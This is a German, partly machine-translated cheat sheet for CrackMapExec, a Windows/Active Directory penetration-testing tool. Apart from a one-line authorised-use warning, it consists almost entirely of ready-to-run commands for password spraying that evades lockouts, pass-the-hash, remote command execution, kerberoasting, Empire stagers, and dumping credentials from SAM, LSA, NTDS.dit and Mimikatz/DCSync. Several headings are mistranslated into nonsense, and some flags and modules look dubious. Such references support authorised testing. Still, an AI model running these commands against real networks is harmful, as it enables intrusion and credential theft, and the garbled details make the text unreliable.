Zum Inhalt

CrackMapExec Cheat Sheet

generieren

Überblick

CrackMapExec (CME) ist ein Post-Exploitation-Tool für Penetrationstests und rote Team-Operationen in Windows/Active Directory-Umgebungen. Es wird oft als "Swiss Army Messer" für Netzwerkdurchdringungstests beschrieben, die Aufzählung, Anmeldeprüfung und Befehlsausführung über mehrere Protokolle ermöglichen.

ZEIT Warning: CrackMapExec ist ein Sicherheitstest-Tool, das nur in Umgebungen verwendet werden sollte, in denen Sie eine ausdrückliche Erlaubnis dazu haben.

Installation

Verwendung von pipx (empfohlen)

```bash

Install pipx if not already installed

python3 -m pip install --user pipx python3 -m pipx ensurepath

Install CrackMapExec

pipx install crackmapexec ```_

Auf Kali Linux

bash sudo apt update sudo apt install -y crackmapexec_

Von GitHub

bash git clone https://github.com/byt3bl33d3r/CrackMapExec cd CrackMapExec poetry install_

Verwendung von Docker

bash docker pull byt3bl33d3r/crackmapexec docker run -it --entrypoint=/bin/bash byt3bl33d3r/crackmapexec_

Basisnutzung

Allgemeine Syntax

bash crackmapexec <protocol> <target(s)> -u <username> -p <password> [options]_

Unterstützte Protokolle

  • smb: Server-Nachrichtenblock
  • winrm: Windows Remote Management
  • ldap: Lightweight Directory Access Protocol
  • mssql: Microsoft SQL Server
  • ssh
  • rdp_: Remote Desktop Protocol
  • ftp_: Dateiübertragungsprotokoll

Zielvorgabe

```bash

Single target

crackmapexec smb 192.168.1.100

Multiple targets

crackmapexec smb 192.168.1.100,192.168.1.101

IP range

crackmapexec smb 192.168.1.1-255

CIDR notation

crackmapexec smb 192.168.1.0/24

From file

crackmapexec smb targets.txt ```_

Authentifizierungsmethoden

Benutzername und Passwort

```bash

Single username and password

crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123'

Multiple usernames

crackmapexec smb 192.168.1.0/24 -u administrator,user1 -p 'Password123'

Multiple passwords

crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123','Welcome1'

From files

crackmapexec smb 192.168.1.0/24 -u users.txt -p passwords.txt ```_

Pass-the-Hash

```bash

NTLM hash

crackmapexec smb 192.168.1.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0'

Multiple hashes

crackmapexec smb 192.168.1.0/24 -u administrator -H 'hash1' 'hash2'

From file

crackmapexec smb 192.168.1.0/24 -u administrator -H hashes.txt ```_

Lokale Authentifizierung

bash crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --local-auth_

Domain Authentication

bash crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -d DOMAIN_

SMB Protokoll Befehle

Grundaufzählung

```bash

List shares

crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --shares

List logged-on users

crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --loggedon-users

List domain users

crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --users

List domain groups

crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --groups

List local groups

crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --local-groups

Get domain password policy

crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --pass-pol

Check for SMB signing

crackmapexec smb 192.168.1.0/24 --gen-relay-list relay_targets.txt ```_

Ausführung des Befehls

```bash

Execute command

crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -x 'whoami'

Execute PowerShell command

crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -X '$PSVersionTable' ```_

Dateioperationen

```bash

List files in share

crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --spider C$ --pattern '*.txt'

Download file

crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --get-file 'C:\temp\file.txt' /tmp/file.txt

Upload file

crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --put-file /tmp/file.txt 'C:\temp\file.txt' ```_

WinRM Protokoll Befehle

Grundaufzählung

```bash

Check WinRM access

crackmapexec winrm 192.168.1.0/24 -u administrator -p 'Password123' ```_

Ausführung des Befehls

```bash

Execute command

crackmapexec winrm 192.168.1.0/24 -u administrator -p 'Password123' -x 'whoami'

Execute PowerShell command

crackmapexec winrm 192.168.1.0/24 -u administrator -p 'Password123' -X '$PSVersionTable' ```_

LDAP Protokoll Befehle

Grundaufzählung

```bash

Get domain information

crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --domain

List domain users

crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --users

List domain groups

crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --groups

List domain computers

crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --computers

Get domain password policy

crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --pass-pol

Get domain trusts

crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --trusts ```_

Fortgeschrittene Zählung

```bash

Search for specific attributes

crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' -M maq -o ATTRIBUTES=description

Search for unconstrained delegation

crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --trusted-for-delegation

Search for constrained delegation

crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --allowed-to-delegate

Search for ASREP roastable users

crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --asreproast output.txt

Search for kerberoastable users

crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --kerberoasting output.txt ```_

MSSQL Protokoll Befehle

Grundaufzählung

```bash

Check MSSQL access

crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123'

List databases

crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' -q 'SELECT name FROM master.dbo.sysdatabases' ```_

Ausführung des Befehls

```bash

Execute command

crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' -x 'whoami'

Execute query

crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' -q 'SELECT @@version' ```_

Modulnutzung

Modulmanagement

```bash

List available modules

crackmapexec --list-modules

Get module options

crackmapexec -M --options

Use module

crackmapexec -u -p -M -o OPTION1=value1 OPTION2=value2 ```_

Gemeinsame Module

Mimikatz

```bash

Dump credentials

crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='sekurlsa::logonpasswords'

Get LSA secrets

crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::secrets'

Get SAM database

crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::sam'

Get DCSync

crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::dcsync /domain:domain.local /user:krbtgt' ```_

Reich

```bash

Generate Empire stager

crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M empire_exec -o LISTENER=http ```_

PowerView

```bash

Run PowerView commands

crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M powerview -o COMMAND='Get-NetDomain' ```_

Bluthochdruck

```bash

Collect BloodHound data

crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M bloodhound -o COLLECTION=All ```_

Lsassy

```bash

Dump credentials using lsassy

crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M lsassy ```_

Enum_DNS

```bash

Enumerate DNS records

crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M enum_dns ```_

ANHANG

```bash

Get objects and attributes from domain

crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' -M goad ```_

Erweiterte Techniken

Passwort-Spray

```bash

Spray single password against multiple users

crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Spring2023!'

Spray multiple passwords against single user

crackmapexec smb 192.168.1.0/24 -u administrator -p passwords.txt

Spray with jitter to avoid lockouts

crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Spring2023!' --continue-on-success --fail-limit 1 --jitter 10 ```_

Credential Harvesting

```bash

Dump SAM database

crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --sam

Dump LSA secrets

crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --lsa

Dump NTDS.dit

crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --ntds ```_

Datenbanken

Datenbank initialisieren

bash crackmapexec smb 192.168.1.0/24 --database_

Datenbank anzeigen

```bash

List hosts

crackmapexec smb --database -L

List credentials

crackmapexec smb --database -C

Use credentials from database

crackmapexec smb 192.168.1.0/24 --database -id 1 ```_

Gemeinsame Optionen

| | Option | Description | | | --- | --- | | | -h, --help | Show help message and exit | | | | -t THREADS | Set number of concurrent threads (default: 100) | | | | --timeout TIMEOUT | Set timeout for connections (default: 5 seconds) | | | | --verbose | Enable verbose output | | | | --debug | Enable debug output | | | | --continue-on-success | Continue authentication attempts even after success | | | | --no-bruteforce | No bruteforce, only use provided credentials | | | | --fail-limit LIMIT | Number of failed login attempts before giving up on a host | | | | --jitter JITTER | Add random delay between authentication attempts (in seconds) | | | | --local-auth | Authenticate using local accounts instead of domain | | | | -d, --domain DOMAIN | Domain to authenticate to | | | | --no-output | Do not display output | | | | --output-file FILE | Write output to file | | | | --log | Enable logging to file (default: ~/.cme/logs/) | |

Protokoll-spezifische Optionen

SMB Optionen

| | Option | Description | | | --- | --- | | | --shares | List available shares | | | | --sessions | List active sessions | | | | --disks | List disks | | | | --loggedon-users | List logged-on users | | | | --users | List domain users | | | | --groups | List domain groups | | | | --local-groups | List local groups | | | | --pass-pol | Get password policy | | | | --rid-brute [MAX_RID] | Enumerate users by bruteforcing RID | | | | --sam | Dump SAM hashes | | | | --lsa | Dump LSA secrets | | | | --ntds | Dump NTDS.dit | | | | --exec-method \\{smbexec,wmiexec,mmcexec,atexec\\} | Method to execute commands | |

LDAP Optionen

| | Option | Description | | | --- | --- | | | --users | List domain users | | | | --groups | List domain groups | | | | --computers | List domain computers | | | | --domain | Get domain information | | | | --pass-pol | Get password policy | | | | --trusts | Get domain trusts | | | | --asreproast [OUTFILE] | Get AS-REP roastable users | | | | --kerberoasting [OUTFILE] | Get kerberoastable users | | | | --trusted-for-delegation | Get users/computers with unconstrained delegation | | | | --allowed-to-delegate | Get users/computers with constrained delegation | |

WinRM Optionen

| | Option | Description | | | --- | --- | | | --port [PORT] | WinRM port (default: 5985) | | | | --ssl | Use SSL for WinRM | |

MSSQL Optionen

| | Option | Description | | | --- | --- | | | --port [PORT] | MSSQL port (default: 1433) | | | | -q QUERY | Execute SQL query | |

Ressourcen